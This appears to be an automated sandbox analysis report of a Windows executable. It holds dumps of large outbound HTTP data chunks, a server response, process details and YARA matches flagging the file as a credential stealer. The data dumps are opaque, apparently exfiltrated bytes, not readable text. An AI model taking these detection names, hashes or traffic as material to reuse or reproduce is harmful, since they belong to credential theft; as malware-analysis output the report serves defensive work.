                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 1f e4 e5 bf f5 27 1e 4e 9b b9 45 bf 69 c1 97 be 7e ff b8 e6 8b 62 70 82 f9 71 a1 52 df 15 d2 a4 76 e8 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49
                                                                                  Data Ascii: 'NEi~bpqRvO,v;Uo|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyI
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: da d0 9c 07 c8 37 08 89 82 d7 ed da 86 9a ab 7e 13 be aa 8e c8 da 85 ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86
                                                                                  Data Ascii: 7~!&g&D;k7vK.ON_S-WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?n
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 08 e3 d9 bd a8 63 0d 1f fd 92 74 35 dd eb 17 3c 5e 64 59 29 d3 03 40 85 97 34 b2 e0 37 ad 9a 80 ba a2 d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5
                                                                                  Data Ascii: ct5<^dY)@47Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 38 c7 90 e5 1d 88 72 00 ba 8f 5a 17 c6 f9 89 15 90 d4 08 ba c1 dd a0 c8 07 71 ed 07 e6 94 19 a1 ee 44 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0
                                                                                  Data Ascii: 8rZqDA|jq}-f*ZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 15 95 03 ba ca b0 17 6f f9 73 d0 ae c8 17 ab 26 5a bc 39 44 f6 5c bd fb e8 dc 10 7f 86 54 e5 a3 0c 7f d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10
                                                                                  Data Ascii: os&Z9D\T\2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: c6 e3 88 c8 41 9f f7 86 79 70 48 00 ef db b2 cd c2 43 b6 34 4a 12 5c df ec 51 5e c2 bd 62 45 7b 25 63 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72
                                                                                  Data Ascii: AypHC4J\Q^bE{%chSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 1c 61 82 b0 9d e2 6a ac d7 0f 21 5b 92 6d 82 97 7a 0d 0a d6 60 62 4a 31 09 36 36 a4 59 67 0c f5 fa 6c 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46
                                                                                  Data Ascii: aj![mz`bJ166Ygl6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF
                                                                                  2024-10-29 11:05:42 UTC1020INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:05:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=e89gjrilahh24rrj40jtig2n1c; expires=Sat, 22 Feb 2025 04:51:50 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LU0bGTBLHmpGc5ky2qKEyOpM27GZPYWPXgzowGdhm9HBI7OVkT86bKkDkYM27SjPHDJHkK39LYDFQPtT2quDo6aC0%2FlUiDLGbMescWUNnepDjV26hSTsIKrLJm3C7%2Bzf69qtPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2b05dcab96c79-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1042&sent=218&recv=613&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573959&delivery_rate=2618444&cwnd=251&unsent_bytes=0&cid=1bfbb8fa272ff413&ts=32910&x=0"


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:07:04:06
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0xd0000
                                                                                  File size:2'922'496 bytes
                                                                                  MD5 hash:DC20EE0AC31F3E17CBD727DE4644F7AA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2556801144.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Non-executed Functions

                                                                                    Function 00D96A0A Relevance: .2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D94000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_3_d93000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction ID: 500d25b9c4c7a94e61a0b8a8d3a54cda3ea3f931e20cf92cfe7b458ae8b26443
                                                                                    • Opcode Fuzzy Hash: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction Fuzzy Hash: 888153300093D69FCB17CF38CAA5696BFA2BF03318B1D46DDD8C18E263D261A955C766
                                                                                    Function 00D96A0A Relevance: .2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D93000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_3_d93000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction ID: 500d25b9c4c7a94e61a0b8a8d3a54cda3ea3f931e20cf92cfe7b458ae8b26443
                                                                                    • Opcode Fuzzy Hash: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction Fuzzy Hash: 888153300093D69FCB17CF38CAA5696BFA2BF03318B1D46DDD8C18E263D261A955C766